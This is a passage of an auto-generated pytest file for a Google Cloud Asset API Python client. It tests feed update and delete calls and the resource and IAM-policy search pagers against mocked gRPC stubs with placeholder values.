credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
)
response = client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.UpdateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
def test_update_feed_from_dict():
test_update_feed(request_type=dict)
def test_update_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
client.update_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.UpdateFeedRequest()
@pytest.mark.asyncio
async def test_update_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.UpdateFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
))
response = await client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.UpdateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
@pytest.mark.asyncio
async def test_update_feed_async_from_dict():
await test_update_feed_async(request_type=dict)
def test_update_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.UpdateFeedRequest()
request.feed.name = 'feed.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
call.return_value = asset_service.Feed()
client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'feed.name=feed.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_feed_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.UpdateFeedRequest()
request.feed.name = 'feed.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
await client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'feed.name=feed.name/value',
) in kw['metadata']
def test_update_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_feed(
feed=asset_service.Feed(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].feed == asset_service.Feed(name='name_value')
def test_update_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_feed(
asset_service.UpdateFeedRequest(),
feed=asset_service.Feed(name='name_value'),
)
@pytest.mark.asyncio
async def test_update_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_feed(
feed=asset_service.Feed(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].feed == asset_service.Feed(name='name_value')
@pytest.mark.asyncio
async def test_update_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_feed(
asset_service.UpdateFeedRequest(),
feed=asset_service.Feed(name='name_value'),
)
def test_delete_feed(transport: str = 'grpc', request_type=asset_service.DeleteFeedRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.DeleteFeedRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_feed_from_dict():
test_delete_feed(request_type=dict)
def test_delete_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
client.delete_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.DeleteFeedRequest()
@pytest.mark.asyncio
async def test_delete_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.DeleteFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.DeleteFeedRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_feed_async_from_dict():
await test_delete_feed_async(request_type=dict)
def test_delete_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.DeleteFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
call.return_value = None
client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_feed_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.DeleteFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_feed(
asset_service.DeleteFeedRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_feed(
asset_service.DeleteFeedRequest(),
name='name_value',
)
def test_search_all_resources(transport: str = 'grpc', request_type=asset_service.SearchAllResourcesRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllResourcesResponse(
next_page_token='next_page_token_value',
)
response = client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllResourcesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllResourcesPager)
assert response.next_page_token == 'next_page_token_value'
def test_search_all_resources_from_dict():
test_search_all_resources(request_type=dict)
def test_search_all_resources_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
client.search_all_resources()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllResourcesRequest()
@pytest.mark.asyncio
async def test_search_all_resources_async(transport: str = 'grpc_asyncio', request_type=asset_service.SearchAllResourcesRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllResourcesResponse(
next_page_token='next_page_token_value',
))
response = await client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllResourcesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllResourcesAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_search_all_resources_async_from_dict():
await test_search_all_resources_async(request_type=dict)
def test_search_all_resources_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllResourcesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
call.return_value = asset_service.SearchAllResourcesResponse()
client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_search_all_resources_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllResourcesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllResourcesResponse())
await client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
def test_search_all_resources_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllResourcesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.search_all_resources(
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
assert args[0].asset_types == ['asset_types_value']
def test_search_all_resources_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.search_all_resources(
asset_service.SearchAllResourcesRequest(),
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
@pytest.mark.asyncio
async def test_search_all_resources_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllResourcesResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.search_all_resources(
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
assert args[0].asset_types == ['asset_types_value']
@pytest.mark.asyncio
async def test_search_all_resources_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.search_all_resources(
asset_service.SearchAllResourcesRequest(),
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
def test_search_all_resources_pager():
client = AssetServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
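        # Build the routing metadata the client is expected to attach; the scope
        # value is empty because the request dict below leaves it unset.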
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('scope', ''),
)),
)
pager = client.search_all_resources(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, assets.ResourceSearchResult)
for i in results)
def test_search_all_resources_pages():
client = AssetServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
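        # Iterating .pages yields one page per mocked response; the final page
        # reports an empty next_page_token.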
pages = list(client.search_all_resources(request={}).pages)
        for page_, token in zip(pages, ['abc', 'def', 'ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_search_all_resources_async_pager():
client = AssetServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
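        # Awaiting the paged method returns an async pager; iterating it yields
        # the individual results across all mocked pages.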
async_pager = await client.search_all_resources(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, assets.ResourceSearchResult)
for i in responses)
@pytest.mark.asyncio
async def test_search_all_resources_async_pages():
client = AssetServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.search_all_resources(request={})).pages:
pages.append(page_)
        for page_, token in zip(pages, ['abc', 'def', 'ghi', '']):
assert page_.raw_page.next_page_token == token
def test_search_all_iam_policies(transport: str = 'grpc', request_type=asset_service.SearchAllIamPoliciesRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllIamPoliciesResponse(
next_page_token='next_page_token_value',
)
response = client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllIamPoliciesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllIamPoliciesPager)
assert response.next_page_token == 'next_page_token_value'
def test_search_all_iam_policies_from_dict():
test_search_all_iam_policies(request_type=dict)
def test_search_all_iam_policies_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
client.search_all_iam_policies()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllIamPoliciesRequest()
@pytest.mark.asyncio
async def test_search_all_iam_policies_async(transport: str = 'grpc_asyncio', request_type=asset_service.SearchAllIamPoliciesRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllIamPoliciesResponse(
next_page_token='next_page_token_value',
))
response = await client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllIamPoliciesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllIamPoliciesAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_search_all_iam_policies_async_from_dict():
await test_search_all_iam_policies_async(request_type=dict)
def test_search_all_iam_policies_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllIamPoliciesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
call.return_value = asset_service.SearchAllIamPoliciesResponse()
client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_search_all_iam_policies_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllIamPoliciesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllIamPoliciesResponse())
await client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
def test_search_all_iam_policies_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllIamPoliciesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.search_all_iam_policies(
scope='scope_value',
query='query_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
def test_search_all_iam_policies_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.search_all_iam_policies(
asset_service.SearchAllIamPoliciesRequest(),
scope='scope_value',
query='query_value',
)
@pytest.mark.asyncio
async def test_search_all_iam_policies_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllIamPoliciesResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.search_all_iam_policies(
scope='scope_value',
query='query_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
@pytest.mark.asyncio
async def test_search_all_iam_policies_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.search_all_iam_policies(
asset_service.SearchAllIamPoliciesRequest(),
scope='scope_value',
query='query_value',
)
def test_search_all_iam_policies_pager():
client = AssetServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('scope', ''),
)),
)
pager = client.search_all_iam_policies(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, assets.IamPolicySearchResult)
for i in results)
def test_search_all_iam_policies_pages():
client = AssetServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
RuntimeError,
)
pages = list(client.search_all_iam_policies(request={}).pages)
        for page_, token in zip(pages, ['abc', 'def', 'ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_search_all_iam_policies_async_pager():
client = AssetServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
